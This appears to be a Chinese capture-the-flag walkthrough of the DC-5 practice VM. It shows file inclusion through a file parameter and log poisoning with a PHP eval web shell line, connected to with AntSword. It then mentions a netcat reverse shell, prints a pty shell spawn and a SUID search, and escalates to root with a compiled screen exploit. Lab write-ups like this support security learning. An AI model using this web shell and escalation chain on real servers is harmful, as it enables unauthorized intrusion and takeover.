大道之行,天下为公。这篇文章主要讲述靶机DC-5相关的知识,希望能为你提供帮助。
DC-5靶机下载地址:https://www.five86.com/dc-5.html
扫描网段探测靶机ip
![靶机DC-5](http://img.readke.com/220525/06363H428-0.jpg)
文章图片
?
访问下web站点 发现在contact提交后,每次提交完成后显示的年份都会发生变化
![靶机DC-5](http://img.readke.com/220525/06363K4V-1.jpg)
文章图片
![靶机DC-5](http://img.readke.com/220525/06363I129-2.jpg)
文章图片
每次都会带上的查询的参数,可以尝试下能不能访问别的文件
![靶机DC-5](http://img.readke.com/220525/06363KH7-3.jpg)
文章图片
?
原来显示年份的地方变成当前查询的文件的内容了
![靶机DC-5](http://img.readke.com/220525/06363JW1-4.jpg)
文章图片
?
又看了下111端口,也没什么好利用的
![靶机DC-5](http://img.readke.com/220525/06363J5c-5.jpg)
文章图片
还是回到站点上,通过查看nginx配置文件找到访问日志和错误日志的路径
?file=/etc/nginx/nginx.conf
![靶机DC-5](http://img.readke.com/220525/06363G608-6.jpg)
文章图片
访问access.log,然后在url出插入一句话,不能用post参数,然后在error日志中可以看到这条操作
?<
?php eval($_REQUEST[\'admin\']);
?>
![靶机DC-5](http://img.readke.com/220525/06363MB4-7.jpg)
文章图片
![靶机DC-5](http://img.readke.com/220525/06363MK2-8.jpg)
文章图片
然后使用蚁剑连接,连access.log和error.log都是可以的 将上面的url直接复制到蚁剑即可
连access.log建议把安全软件暂时关一下
http://your-ip/thankyou.php?file=/var/log/error.log
![靶机DC-5](http://img.readke.com/220525/06363G957-9.jpg)
文章图片
![靶机DC-5](http://img.readke.com/220525/06363LE2-10.jpg)
文章图片
打开虚拟终端,然后nc弹到kali上
![靶机DC-5](http://img.readke.com/220525/06363K445-11.jpg)
文章图片
获取交互模式
python -c \'import pty;
pty.spawn("/bin/sh")\'
参照DC1的提权方法,用find命令查看有sudo权限的指令
find / -perm -u=s -type f 2>
/dev/null
![靶机DC-5](http://img.readke.com/220525/06363I2N-12.jpg)
文章图片
【靶机DC-5】试了下前面几个命令不太行 直接干screen,先搜索下漏洞
![靶机DC-5](http://img.readke.com/220525/06363K238-13.jpg)
文章图片
将脚本文件上传到靶机发现不能直接用,还需要处理下 脚本文件里会有一些说明
![靶机DC-5](http://img.readke.com/220525/06363J1J-14.jpg)
文章图片
将这些文件放到tmp目录下,然后指定gcc命令编译,上图箭头所指的命令
![靶机DC-5](http://img.readke.com/220525/06363M951-15.jpg)
文章图片
![靶机DC-5](http://img.readke.com/220525/06363G416-16.jpg)
文章图片
完成后,这俩绿色儿的上传到靶机tmp目录,方法随意
![靶机DC-5](http://img.readke.com/220525/06363L4G-17.jpg)
文章图片
![靶机DC-5](http://img.readke.com/220525/06363G252-18.jpg)
文章图片
?
然后再执行下列命令,#号别带上
![靶机DC-5](http://img.readke.com/220525/06363MD4-19.jpg)
文章图片
提权成功
![靶机DC-5](http://img.readke.com/220525/06363K264-20.jpg)
文章图片
在root目录下找到flag
![靶机DC-5](http://img.readke.com/220525/06363G350-21.jpg)
文章图片
推荐阅读
- vue开发(前端项目模板)
- MySQL 不完全入门指南
- 静态路由-路由负载均衡
- “不服跑个分(” 是噱头还是实力?| 龙蜥技术)
- 红帽Linux入门指南第一期(红帽 RHEL 8.0 操作系统安装步骤详解)
- 网络安全学习笔记工具篇——GSIL GITHUB敏感信息泄露检测工具
- 如何实现word在线预览
- 如何重启数据库服务(包含单实例/流复制/集群)
- 接口测试进阶接口脚本使用--apipost(预/后执行脚本)